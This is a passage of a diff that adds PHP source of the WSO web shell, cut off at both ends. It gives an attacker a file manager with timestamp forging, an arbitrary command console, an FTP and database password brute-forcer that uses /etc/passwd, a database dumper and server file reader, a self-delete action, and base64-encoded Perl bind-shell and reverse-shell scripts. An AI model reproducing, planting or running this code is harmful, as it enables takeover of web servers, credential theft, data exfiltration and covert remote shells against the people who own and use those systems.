+            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
+		</form></div>";
+	wsoFooter();
+}
+
+function actionFilesTools() {
+	if( isset($_POST['p1']) )
+		$_POST['p1'] = urldecode($_POST['p1']);
+	if(@$_POST['p2']=='download') {
+		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
+			ob_start("ob_gzhandler", 4096);
+			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
+			if (function_exists("mime_content_type")) {
+				$type = @mime_content_type($_POST['p1']);
+				header("Content-Type: " . $type);
+			} else
+                header("Content-Type: application/octet-stream");
+			$fp = @fopen($_POST['p1'], "r");
+			if($fp) {
+				while(!@feof($fp))
+					echo @fread($fp, 1024);
+				fclose($fp);
+			}
+		}exit;
+	}
+	if( @$_POST['p2'] == 'mkfile' ) {
+		if(!file_exists($_POST['p1'])) {
+			$fp = @fopen($_POST['p1'], 'w');
+			if($fp) {
+				$_POST['p2'] = "edit";
+				fclose($fp);
+			}
+		}
+	}
+	wsoHeader();
+	echo '<h1>File tools</h1><div class=content>';
+	if( !file_exists(@$_POST['p1']) ) {
+		echo 'File not exists';
+		wsoFooter();
+		return;
+	}
+	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
+	if(!$uid) {
+		$uid['name'] = @fileowner($_POST['p1']);
+		$gid['name'] = @filegroup($_POST['p1']);
+	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
+	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
+	echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
+	if( empty($_POST['p2']) )
+		$_POST['p2'] = 'view';
+	if( is_file($_POST['p1']) )
+		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
+	else
+		$m = array('Chmod', 'Rename', 'Touch');
+	foreach($m as $v)
+		echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
+	echo '<br><br>';
+	switch($_POST['p2']) {
+		case 'view':
+			echo '<pre class=ml1>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</pre>';
+			break;
+		case 'highlight':
+			if( @is_readable($_POST['p1']) ) {
+				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
+				$code = @highlight_file($_POST['p1'],true);
+				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
+			}
+			break;
+		case 'chmod':
+			if( !empty($_POST['p3']) ) {
+				$perms = 0;
+				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
+					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
+				if(!@chmod($_POST['p1'], $perms))
+					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
+			break;
+		case 'edit':
+			if( !is_writable($_POST['p1'])) {
+				echo 'File isn\'t writeable';
+				break;
+			}
+			if( !empty($_POST['p3']) ) {
+				$time = @filemtime($_POST['p1']);
+				$_POST['p3'] = substr($_POST['p3'],1);
+				$fp = @fopen($_POST['p1'],"w");
+				if($fp) {
+					@fwrite($fp,$_POST['p3']);
+					@fclose($fp);
+					echo 'Saved!<br><script>p3_="";</script>';
+					@touch($_POST['p1'],$time,$time);
+				}
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '</textarea><input type=submit value=">>"></form>';
+			break;
+		case 'hexdump':
+			$c = @file_get_contents($_POST['p1']);
+			$n = 0;
+			$h = array('00000000<br>','','');
+			$len = strlen($c);
+			for ($i=0; $i<$len; ++$i) {
+				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
+				switch ( ord($c[$i]) ) {
+					case 0:  $h[2] .= ' '; break;
+					case 9:  $h[2] .= ' '; break;
+					case 10: $h[2] .= ' '; break;
+					case 13: $h[2] .= ' '; break;
+					default: $h[2] .= $c[$i]; break;
+				}
+				$n++;
+				if ($n == 32) {
+					$n = 0;
+					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
+					$h[1] .= '<br>';
+					$h[2] .= "\n";
+				}
+		 	}
+			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
+			break;
+		case 'rename':
+			if( !empty($_POST['p3']) ) {
+				if(!@rename($_POST['p1'], $_POST['p3']))
+					echo 'Can\'t rename!<br>';
+				else
+					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
+			}
+			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
+			break;
+		case 'touch':
+			if( !empty($_POST['p3']) ) {
+				$time = strtotime($_POST['p3']);
+				if($time) {
+					if(!touch($_POST['p1'],$time,$time))
+						echo 'Fail!';
+					else
+						echo 'Touched!';
+				} else echo 'Bad time format!';
+			}
+			clearstatcache();
+			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
+			break;
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionConsole() {
+    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
+        $_POST['p1'] .= ' 2>&1';
+    } elseif(!empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
+
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		echo "d.cf.cmd.value='';\n";
+		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
+		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
+			if(@chdir($match[1])) {
+				$GLOBALS['cwd'] = @getcwd();
+				echo "c_='".$GLOBALS['cwd']."';";
+			}
+		}
+		echo "d.cf.output.value+='".$temp."';";
+		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
+		$temp = ob_get_clean();
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+    echo "<script>
+if(window.Event) window.captureEvents(Event.KEYDOWN);
+var cmds = new Array('');
+var cur = 0;
+function kp(e) {
+	var n = (window.Event) ? e.which : e.keyCode;
+	if(n == 38) {
+		cur--;
+		if(cur>=0)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur++;
+	} else if(n == 40) {
+		cur++;
+		if(cur < cmds.length)
+			document.cf.cmd.value = cmds[cur];
+		else
+			cur--;
+	}
+}
+function add(cmd) {
+	cmds.pop();
+	cmds.push(cmd);
+	cmds.push('');
+	cur = cmds.length-1;
+}
+</script>";
+	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
+	foreach($GLOBALS['aliases'] as $n => $v) {
+		if($v == '') {
+			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
+			continue;
+		}
+		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
+	}
+	
+	echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
+	if(!empty($_POST['p1'])) {
+		echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
+	}
+	echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
+	echo '</form></div><script>d.cf.cmd.focus();</script>';
+	wsoFooter();
+}
+
+function actionLogout() {
+    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
+	die('bye!');
+}
+
+function actionSelfRemove() {
+
+	if($_POST['p1'] == 'yes')
+		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
+			die('Shell has been removed');
+		else
+			echo 'unlink error!';
+    if($_POST['p1'] != 'yes')
+        wsoHeader();
+	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
+	wsoFooter();
+}
+
+function actionBruteforce() {
+	wsoHeader();
+	if( isset($_POST['proto']) ) {
+		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
+		if( $_POST['proto'] == 'ftp' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$fp = @ftp_connect($ip, $port?$port:21);
+				if(!$fp) return false;
+				$res = @ftp_login($fp, $login, $pass);
+				@ftp_close($fp);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'mysql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
+				@mysql_close($res);
+				return $res;
+			}
+		} elseif( $_POST['proto'] == 'pgsql' ) {
+			function wsoBruteForce($ip,$port,$login,$pass) {
+				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
+				$res = @pg_connect($str);
+				@pg_close($res);
+				return $res;
+			}
+		}
+		$success = 0;
+		$attempts = 0;
+		$server = explode(":", $_POST['server']);
+		if($_POST['type'] == 1) {
+			$temp = @file('/etc/passwd');
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = explode(":", $line);
+					++$attempts;
+					if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
+					}
+					if(@$_POST['reverse']) {
+						$tmp = "";
+						for($i=strlen($line[0])-1; $i>=0; --$i)
+							$tmp .= $line[0][$i];
+						++$attempts;
+						if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
+							$success++;
+							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
+						}
+					}
+				}
+		} elseif($_POST['type'] == 2) {
+			$temp = @file($_POST['dict']);
+			if( is_array($temp) )
+				foreach($temp as $line) {
+					$line = trim($line);
+					++$attempts;
+					if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
+						$success++;
+						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
+					}
+				}
+		}
+		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
+	}
+	echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
+		.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
+		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
+		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
+		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
+		.'<span>Server:port</span></td>'
+		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
+		.'<tr><td><span>Brute type</span></td>'
+		.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
+		.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
+		.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
+		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
+		.'<td><input type=text name=login value="root"></td></tr>'
+		.'<tr><td><span>Dictionary</span></td>'
+		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
+		.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
+	echo '</div><br>';
+	wsoFooter();
+}
+
+function actionSql() {
+	class DbClass {
+		var $type;
+		var $link;
+		var $res;
+		function DbClass($type)	{
+			$this->type = $type;
+		}
+		function connect($host, $user, $pass, $dbname){
+			switch($this->type)	{
+				case 'mysql':
+					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
+					break;
+				case 'pgsql':
+					$host = explode(':', $host);
+					if(!$host[1]) $host[1]=5432;
+					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
+					break;
+			}
+			return false;
+		}
+		function selectdb($db) {
+			switch($this->type)	{
+				case 'mysql':
+					if (@mysql_select_db($db))return true;
+					break;
+			}
+			return false;
+		}
+		function query($str) {
+			switch($this->type) {
+				case 'mysql':
+					return $this->res = @mysql_query($str);
+					break;
+				case 'pgsql':
+					return $this->res = @pg_query($this->link,$str);
+					break;
+			}
+			return false;
+		}
+		function fetch() {
+			$res = func_num_args()?func_get_arg(0):$this->res;
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_fetch_assoc($res);
+					break;
+				case 'pgsql':
+					return @pg_fetch_assoc($res);
+					break;
+			}
+			return false;
+		}
+		function listDbs() {
+			switch($this->type)	{
+				case 'mysql':
+                        return $this->query("SHOW databases");
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
+				break;
+			}
+			return false;
+		}
+		function listTables() {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->res = $this->query('SHOW TABLES');
+				break;
+				case 'pgsql':
+					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
+				break;
+			}
+			return false;
+		}
+		function error() {
+			switch($this->type)	{
+				case 'mysql':
+					return @mysql_error();
+				break;
+				case 'pgsql':
+					return @pg_last_error();
+				break;
+			}
+			return false;
+		}
+		function setCharset($str) {
+			switch($this->type)	{
+				case 'mysql':
+					if(function_exists('mysql_set_charset'))
+						return @mysql_set_charset($str, $this->link);
+					else
+						$this->query('SET CHARSET '.$str);
+					break;
+				case 'pgsql':
+					return @pg_set_client_encoding($this->link, $str);
+					break;
+			}
+			return false;
+		}
+		function loadFile($str) {
+			switch($this->type)	{
+				case 'mysql':
+					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
+				break;
+				case 'pgsql':
+					$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
+					$r=array();
+					while($i=$this->fetch())
+						$r[] = $i['file'];
+					$this->query('drop table wso2');
+					return array('file'=>implode("\n",$r));
+				break;
+			}
+			return false;
+		}
+		function dump($table, $fp = false) {
+			switch($this->type)	{
+				case 'mysql':
+					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
+					$create = mysql_fetch_array($res);
+					$sql = $create[1].";\n";
+                    if($fp) fwrite($fp, $sql); else echo($sql);
+					$this->query('SELECT * FROM `'.$table.'`');
+                    $i = 0;
+                    $head = true;
+					while($item = $this->fetch()) {
+                        $sql = '';
+                        if($i % 1000 == 0) {
+                            $head = true;
+                            $sql = ";\n\n";
+                        }
+
+						$columns = array();
+						foreach($item as $k=>$v) {
+                            if($v === null)
+                                $item[$k] = "NULL";
+                            elseif(is_int($v))
+                                $item[$k] = $v;
+                            else
+                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
+							$columns[] = "`".$k."`";
+						}
+                        if($head) {
+                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
+                            $head = false;
+                        } else
+                            $sql .= "\n\t,(".implode(", ", $item).')';
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+                        $i++;
+					}
+                    if(!$head)
+                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
+				break;
+				case 'pgsql':
+					$this->query('SELECT * FROM '.$table);
+					while($item = $this->fetch()) {
+						$columns = array();
+						foreach($item as $k=>$v) {
+							$item[$k] = "'".addslashes($v)."'";
+							$columns[] = $k;
+						}
+                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
+                        if($fp) fwrite($fp, $sql); else echo($sql);
+					}
+				break;
+			}
+			return false;
+		}
+	};
+	$db = new DbClass($_POST['type']);
+	if(@$_POST['p2']=='download') {
+		$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
+		$db->selectdb($_POST['sql_base']);
+        switch($_POST['charset']) {
+            case "Windows-1251": $db->setCharset('cp1251'); break;
+            case "UTF-8": $db->setCharset('utf8'); break;
+            case "KOI8-R": $db->setCharset('koi8r'); break;
+            case "KOI8-U": $db->setCharset('koi8u'); break;
+            case "cp866": $db->setCharset('cp866'); break;
+        }
+        if(empty($_POST['file'])) {
+            ob_start("ob_gzhandler", 4096);
+            header("Content-Disposition: attachment; filename=dump.sql");
+            header("Content-Type: text/plain");
+            foreach($_POST['tbl'] as $v)
+				$db->dump($v);
+            exit;
+        } elseif($fp = @fopen($_POST['file'], 'w')) {
+            foreach($_POST['tbl'] as $v)
+                $db->dump($v, $fp);
+            fclose($fp);
+            unset($_POST['p2']);
+        } else
+            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
+	}
+	wsoHeader();
+	echo "
+<h1>Sql browser</h1><div class=content>
+<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
+<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
+<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
+<td><select name='type'><option value='mysql' ";
+    if(@$_POST['type']=='mysql')echo 'selected';
+echo ">MySql</option><option value='pgsql' ";
+if(@$_POST['type']=='pgsql')echo 'selected';
+echo ">PostgreSql</option></select></td>
+<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
+<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
+<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
+	$tmp = "<input type=text name=sql_base value=''>";
+	if(isset($_POST['sql_host'])){
+		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
+			switch($_POST['charset']) {
+				case "Windows-1251": $db->setCharset('cp1251'); break;
+				case "UTF-8": $db->setCharset('utf8'); break;
+				case "KOI8-R": $db->setCharset('koi8r'); break;
+				case "KOI8-U": $db->setCharset('koi8u'); break;
+				case "cp866": $db->setCharset('cp866'); break;
+			}
+			$db->listDbs();
+			echo "<select name=sql_base><option value=''></option>";
+			while($item = $db->fetch()) {
+				list($key, $value) = each($item);
+				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
+			}
+			echo '</select>';
+		}
+		else echo $tmp;
+	}else
+		echo $tmp;
+	echo "</td>
+				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
+                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
+			</tr>
+		</table>
+		<script>
+            s_db='".@addslashes($_POST['sql_base'])."';
+            function fs(f) {
+                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
+                    if(f.p1) f.p1.value='';
+                    if(f.p2) f.p2.value='';
+                    if(f.p3) f.p3.value='';
+                }
+            }
+			function st(t,l) {
+				d.sf.p1.value = 'select';
+				d.sf.p2.value = t;
+                if(l && d.sf.p3) d.sf.p3.value = l;
+				d.sf.submit();
+			}
+			function is() {
+				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
+					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
+			}
+		</script>";
+	if(isset($db) && $db->link){
+		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
+			if(!empty($_POST['sql_base'])){
+				$db->selectdb($_POST['sql_base']);
+				echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
+				$tbls_res = $db->listTables();
+				while($item = $db->fetch($tbls_res)) {
+					list($key, $value) = each($item);
+                    if(!empty($_POST['sql_count']))
+                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
+					$value = htmlspecialchars($value);
+					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
+				}
+				echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
+				if(@$_POST['p1'] == 'select') {
+					$_POST['p1'] = 'query';
+                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
+					$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
+					$num = $db->fetch();
+					$pages = ceil($num['n'] / 30);
+                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
+                    echo " of $pages";
+                    if($_POST['p3'] > 1)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
+                    if($_POST['p3'] < $pages)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
+                    $_POST['p3']--;
+					if($_POST['type']=='pgsql')
+						$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
+					else
+						$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
+					echo "<br><br>";
+				}
+				if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
+					$db->query(@$_POST['p2']);
+					if($db->res !== false) {
+						$title = false;
+						echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
+						$line = 1;
+						while($item = $db->fetch())	{
+							if(!$title)	{
+								echo '<tr>';
+								foreach($item as $key => $value)
+									echo '<th>'.$key.'</th>';
+								reset($item);
+								$title=true;
+								echo '</tr><tr>';
+								$line = 2;
+							}
+							echo '<tr class="l'.$line.'">';
+							$line = $line==1?2:1;
+							foreach($item as $key => $value) {
+								if($value == null)
+									echo '<td><i>null</i></td>';
+								else
+									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
+							}
+							echo '</tr>';
+						}
+						echo '</table>';
+					} else {
+						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
+					}
+				}
+				echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
+                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
+                    echo htmlspecialchars($_POST['p2']);
+                echo "</textarea><br/><input type=submit value='Execute'>";
+				echo "</td></tr>";
+			}
+			echo "</table></form><br/>";
+            if($_POST['type']=='mysql') {
+                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
+                if($db->fetch())
+                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
+            }
+			if(@$_POST['p1'] == 'loadfile') {
+				$file = $db->loadFile($_POST['p2']);
+				echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
+			}
+	} else {
+        echo htmlspecialchars($db->error());
+    }
+	echo '</div>';
+	wsoFooter();
+}
+function actionNetwork() {
+	wsoHeader();
+	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
+	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
+	echo "<h1>Network tools</h1><div class=content>
+	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
+	<span>Bind port to /bin/sh [perl]</span><br/>
+	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form>
+	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
+	<span>Back-connect  [perl]</span><br/>
